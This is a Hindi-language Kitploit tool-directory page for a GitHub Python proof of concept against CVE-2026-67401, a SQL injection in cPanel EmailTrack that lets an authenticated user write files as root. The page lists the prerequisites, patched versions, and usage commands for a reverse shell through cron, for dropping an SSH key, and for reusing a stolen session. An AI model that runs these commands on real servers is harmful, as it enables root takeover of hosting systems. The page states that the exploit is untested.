Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-67401 — CVE-2026-67401 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट, cPanel EmailTrack में एक प्रमाणित SQL इंजेक्शन जो SQLite ATTACH DATABASE के माध्यम से रूट के रूप में मनमाना फ़ाइल लेखन की अनुमति देता है, जिससे रिवर्स शेल या SSH कुंजी ड्रॉप संभव हो जाता है। | Kitploit
उपकरण/GitHubGitHub/axedos/cve-2026-67401
विशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubaxedos/cve-2026-67401

CVE-2026-67401

CVE-2026-67401 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट, cPanel EmailTrack में एक प्रमाणित SQL इंजेक्शन जो SQLite ATTACH DATABASE के माध्यम से रूट के रूप में मनमाना फ़ाइल लेखन की अनुमति देता है, जिससे रिवर्स शेल या SSH कुंजी ड्रॉप संभव हो जाता है।

रिपॉजिटरी देखें
11घं 36मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-67401

cPanel EmailTrack में SQL इंजेक्शन। मेल विशेषाधिकारों वाला प्रमाणित cPanel उपयोगकर्ता SQLite ATTACH DATABASE के माध्यम से रूट के रूप में मनमानी फ़ाइलें लिखता है। रूट तक पहुँचने के लिए एक अनुरोध। वास्तविक लक्ष्य पर परीक्षण नहीं किया गया है, कोड केवल सार्वजनिक जानकारी और बुनियादी diff'ing से एक साथ रखा गया है। एक शोधकर्ता के रूप में अपना उचित परिश्रम करें और इसे आज़माएँ और PR फिक्स भेजें।

Sep 8 2026 पैच से पहले के सभी cPanel/WHM बिल्ड को प्रभावित करता है।

क्या मौजूद होना चाहिए

  • लक्ष्य सर्वर पर मेल विशेषाधिकारों वाला मान्य cPanel खाता
  • Python 3, requests लाइब्रेरी
  • रिवर्स शेल पेलोड का उपयोग करने पर एक लिसनर

इसका उपयोग कैसे करें

root@kitploit:~
# क्रॉन के माध्यम से रिवर्स शेल
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# SSH कुंजी ड्रॉप
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# मौजूदा सत्र
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# ड्राई रन (अनुरोध प्रिंट करें, भेजें नहीं)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

फिक्स

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
टूल डाउनलोड करें